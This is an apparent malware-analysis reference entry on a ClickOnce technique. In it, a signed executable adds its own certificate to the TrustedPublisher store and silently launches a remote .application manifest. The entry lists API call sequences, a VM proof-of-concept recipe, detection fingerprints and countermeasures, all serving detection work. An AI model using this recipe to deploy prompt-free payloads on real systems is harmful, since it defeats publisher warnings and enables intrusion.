ClickOnce certificate-trust bootstrap

A Windows PE extracts its own embedded Authenticode signature and installs the publisher certificate into the TrustedPublisher store before using dfshim.dll!ShOpenVerbApplicationW to silently launch a remote ClickOnce .application manifest.

What the technique does

ClickOnce is a Microsoft application-deployment technology that allows applications to be published to a web server and then installed/launched via a URL ending in .application. By default, ClickOnce warns users if the publisher is unknown. This technique pre-emptively trusts the publisher by extracting the signer's certificate from the PE's own signature and adding it to the TrustedPublisher certificate store, then immediately invoking dfshim to fetch the payload. The result: zero user prompts, zero SmartScreen blocks, and a fully signed malware deployment chain.

Detection / fingerprint

• Imports CRYPT32.dll and calls CertOpenSystemStoreA with string "TrustedPublisher" or "ROOT"
• Calls CryptQueryObject on the running module file (obtained via GetModuleFileNameW)
• Calls CertAddCertificateContextToStore or CertAddEncodedCertificateToStore
• Loads dfshim.dll and resolves ShOpenVerbApplicationW
• Command-line or URL contains .application?h= or ScreenConnect.Client.application
• No direct WinINet/WinHTTP/CURL imports; all HTTP traffic is generated by dfshim.dll child processes

Implementation patterns observed

Sample: connectwise 81adbf9a — MSVC C++ PE32, 305 KB, valid Authenticode by ConnectWise, LLC.

1. Self-path resolution: GetModuleFileNameW(NULL, buf, MAX_PATH) ^[raw/analyses/81adbf9a/report.md]
2. Store open: CertOpenSystemStoreA(0, "TrustedPublisher") ^[raw/analyses/81adbf9a/report.md]
3. Signature parse: CryptQueryObject(CERT_QUERY_OBJECT_FILE, selfPath, ...) to obtain HCRYPTMSG ^[raw/analyses/81adbf9a/report.md]
4. Cert iteration: Loop over signers, call CryptMsgGetParam(hMsg, CMSG_CERT_PARAM, index, ...) to get encoded cert blob ^[raw/analyses/81adbf9a/report.md]
5. Trust injection: CertCreateCertificateContext(X509_ASN_ENCODING, blob, len) → CertAddCertificateContextToStore(hStore, pContext, CERT_STORE_ADD_ALWAYS, NULL) ^[raw/analyses/81adbf9a/report.md]
6. ClickOnce launch: LoadLibraryA("dfshim") → GetProcAddress("ShOpenVerbApplicationW") → invoke with URL to remote .application manifest ^[raw/analyses/81adbf9a/report.md]

Reproduce on your own VMs

Goal: Build a minimal PoC that adds a self-signed cert to TrustedPublisher and launches a remote ClickOnce app.

Prerequisites:

• Windows 10/11 research VM with Visual Studio Community
• A self-signed code-signing certificate (see New-SelfSignedCertificate -Type CodeSigningCert in PowerShell)
• A trivial ClickOnce .application manifest published to \\VM-IP\share\ or a local web server

Steps:

1. Create a new C++ Win32 project in VS 2022.
2. Add #include <wincrypt.h> and link crypt32.lib.
3. Implement the six-step flow above.
4. Sign the resulting EXE with your self-signed cert (signtool sign /f mycert.pfx /p password app.exe).
5. Publish a trivial ClickOnce app (e.g., a WinForms "Hello World") to a local IIS folder.
6. Run the signed bootstrapper. On the VM, open certmgr.msc → Trusted Publishers — your self-signed cert should appear.
7. The ClickOnce app should install without an "Unknown Publisher" warning.

What you'll learn: How to detect this at the API-telemetry layer: focus on CryptQueryObject → CertAddCertificateContextToStore → LoadLibrary("dfshim.dll") chains, rather than network indicators.

Defensive countermeasures

• EDR / API telemetry: Alert on CertAddCertificateContextToStore targeting TrustedPublisher or ROOT from a non-installer process.
• WMI / Sysmon Event ID 7: Detect dfshim.dll loaded by non-standard callers (e.g., a random .exe in %TEMP%).
• Application Control (AppLocker / WDAC): Block dfshim.dll execution from unusual paths or parent processes.
• Network: Monitor outbound HTTP(S) requests for .application manifests from dfsvc.exe (the ClickOnce service) to unknown IPs.
• Certificate pinning: If your org uses ConnectWise ScreenConnect legitimately, pin the expected publisher hash and alert on deviations.

Cross-references

• Observed in: connectwise family
• Related concepts: legitimate-remote-access-tool-abuse
• ATT&CK mapping: T1553.004 — Install Root Certificate (publisher variant)